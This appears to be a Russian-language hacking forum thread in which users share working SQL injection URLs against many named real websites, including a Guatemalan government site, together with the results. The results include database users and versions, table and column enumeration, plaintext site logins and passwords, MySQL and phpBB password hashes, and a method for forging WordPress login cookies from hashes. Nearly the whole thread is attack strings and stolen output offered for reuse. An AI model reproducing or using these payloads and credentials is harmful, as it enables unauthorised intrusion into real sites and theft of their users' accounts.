Tyc00n, руки все равно будут всегда лучше и надежнее Словари обнови, добавь стандартные таблицы и поля двигов распостраненных, сам допиши, посмотри по форуму и не будет пропускать)
саксесс http://e*s*h*o*p.w*h*t*t.org/order.php пхпмайадмин имеет стандартный урл, но пас и логин я не нашел ((( и админку не нашел, если кто узнает скрипт - ставьте на локалку, там и таблички с колонками найдете и пути, и всё ваше будет. Так как я таблички и колонки на угад писал уберите звёздочки и не цитируйте плз урл, так как потом удалю может
oferta9.ro HTML: http://www.oferta9.ro/magazin.php?m=-661+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9/* USER:mn76_iuser@localhost VERSION:4.1.22-standard DATABASE:mn76_piata9 disenoemergente.cl HTML: http://www.disenoemergente.cl/index_noticia.php?noticia=-177+union+select+0,1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6,7,8,9,10/* USER:diseno@localhost VERSION:5.0.32-Debian_7etch4-log DATABaSE:diseno guatemala.gob.gt HTML: http://www.guatemala.gob.gt/noticias.php?mes=1&anyo=2006&dia=14&tipo=1+union+select+0,1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),3,4,5,6,7,8,9,10,11,12/* USER:root@localhost VERSION:4.1.7 DATABASEresidencia
http://rs.karacitours-bg.info/ HTML: http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database())/* 5.0.32-Debian_7etch1-log:root@localhost:cs HTML: http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,id,username,pwd)+FROM+alfauser+LIMIT+1,1/* 1:karaci:karaci123 2:rual:rual123 3:desi_karaci:desi001 ... HTML: http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user,password)+FROM+mysql.user/* debian-sys-maint:*D9B5ECA68500BC0D046CB07B2CC6F224E4470FE3
Австралийский сайтец Code: http://www.mgnsw.org.au/museums_and_galleries.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6/* 4.1.20:mgnsw@localhost:mgnsw
Вот такой интересный скуль Code: http://www.ipecac.com/bio.php?id=44' подобрал количество столбцов через order by т.е вот такой код вызывает ошибку Code: http://www.ipecac.com/bio.php?id=44+order+by+5/* вот такой нет Code: http://www.ipecac.com/bio.php?id=44+order+by+4* следовательно должно рабоать Code: http://http://www.ipecac.com/bio.php?id=44/**/union/**/select/**/1,2,3,4/* но почему то кричит:You don't have permission to access /bio.php on this server. в чем проблема ?
4 штуки, но не пускает действительно, шяс еще порыскаю может у них там просто траблы с самим скриптом и мы не виноваты апд - не асили, а шоп у них всёравно на другом домене под aspx
что за нах там ещё xss пассив есть news_search.php так с ней та же самая прабла орет : You don't have permission to access /news_search.php on this server. что за зашита такая подскажите !
dealer:051db1672e6974a5 Code: 17:cb_brends 17:--1:mid 17:--2:title 17:--3:logo 17:--4:descr 18:cb_catalog 18:--1:mid 18:--2:title 18:--3:articul 18:--4:color 18:--5:sizes 18:--6:contain 18:--7:package 18:--8:description 18:--9:foto_small 18:--10:foto_big 18:--11:brend 18:--12:newprod 19:cb_config 19:--1:email 19:--2:phone 19:--3:news_on_main 20:cb_gallery_albums 20:--1:parent 20:--2:name 20:--3:description 21:cb_gallery_images 21:--1:aid 21:--2:file 21:--3:name 21:--4:description 21:--5:alt 21:--6:sort 21:--7:cover 22:cb_menu 22:--1:pid 22:--2:title 22:--3:body 22:--4:modul 22:--5:ord 22:--6:_left 22:--7:_right 22:--8:_level 22:--9:protect 23:cb_menu_seq 24:cb_news 24:--1:mid 24:--2:title 24:--3:anons 24:--4:body 24:--5:date 25:about 25:--1:img1 25:--2:img2 25:--3:img3 25:--4:img4 25:--5:img5 25:--6:text 26:about_main 26:--1:img1 26:--2:img2 26:--3:img3 26:--4:img4 26:--5:img5 27:adv 27:--1:razdel_num 27:--2:head 27:--3:link_excel 27:--4:excel 27:--5:link_html 27:--6:html 27:--7:text 28:anons 28:--1:head 28:--2:img 28:--3:type 28:--4:text 28:--5:when 28:--6:visibility 29:asociate 29:--1:asociate_teacher 29:--2:asociate_to 29:--3:asociate_type 30:auth 30:--1:password 31:cons 31:--1:name 31:--2:email 31:--3:city 31:--4:message 31:--5:answer 31:--6:time 32:dealers 32:--1:login 32:--2:password 33:dealers_files 33:--1:name 33:--2:file 33:--3:text 34:fakultet 34:--1:fakultet_name 34:--2:fakultet_type 35:groupe 35:--1:groupe_name 35:--2:groupe_id_kaf
свежая уязвимость и ... admin|91b41df29d41d9222c99702c718c27c1 admin|5cf5e1e79cc08b7b27e2dfeb6ee136a7 djsonic|85493514b935d53994045bdb044a4ab5 двойной md5 хэш пароль wordpressuser_xxx=логин;wordpresspass_xxx=двойной_md5_хэш_пароля где xxx - md5 хэш урла блога без обратного слэша, например: md5("xttp//site.com/wordpress")
Нужно чтобы -17' - было существующий значение. 17+order+by+1/* Подробнее https://forum.antichat.ru/showpost.php?p=373193&postcount=17 Вообщето есть специальная тема для таких вопросов - http://forum.antichat.ru/threadedpost579824.html#post579824
для bobob возми для примера - http://www.roskrup.ru/grain.html?goods=35'+order+by+1/* http://www.roskrup.ru/grain.html?goods=35'+order+by+50/*
http://www.mediakuzbass.ru/news/index.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/* 4.1.22/media/trakt@localhost ----------------------------------------------------------------------------- http://www.mobd.ru/index.php?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4/* 4.0.25-log/wwwmobdru_mobdru_osc1/[email protected] ----------------------------------------------------------------------------- fisinter.ru http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,version(),database(),user()),3/* 5.0.15-standard-log/KmUtfDe/db@localhost http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,user,Password),3+from+mysql.user/* юзер/хеш root/39d3d1360b2b23b0 -------------------------------------------------------------------------- novoport.ru http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/* 4.0.24_Debian-10sarge2/nvp/root@localhost http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_email),4,5,6+from+phpbb_users/* логин/хеш/мейл Admin/d4825e84f0ce065b97c2c0772f769f1a/[email protected]
rentacarmm.com HTML: http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,concat(user(),0x3a,version(),0x3a,database()),2/*&id=65 USER:car@localhost VERSION:5.0.45-Debian_1-log DATABASE:car HTML: http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,table_name,2+from+information_schema.tables/*&id=65 HTML: http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,column_name,2+from+information_schema.columns/*&id=65 ----------------------------------------------- tercersector.net HTML: http://www.tercersector.net/php/general.php?seccio=sc_pubs&tipus=1+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*&idioma=Cs USER:[email protected] VERSION:4.0.24_Debian-10sarge3-log DATABASEtsweb ----------------------------------------------- tecnocasa.hu HTML: http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*&PHPSESSID=29b0ba2892876c303128bb0626336391 USER:rkcsaGfm7@hm0 VERSION:5.0.32-Debian_7etch4-log DATABASE:tecnocasa_hu HTML: http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables/*&PHPSESSID=29b0ba2892876c303128bb0626336391 HTML: http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns/*&PHPSESSID=29b0ba2892876c303128bb0626336391 HTML: http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name='district'+limit+1,10/*&PHPSESSID=29b0ba2892876c303128bb0626336391 - вывод всех названий колонок таблици district
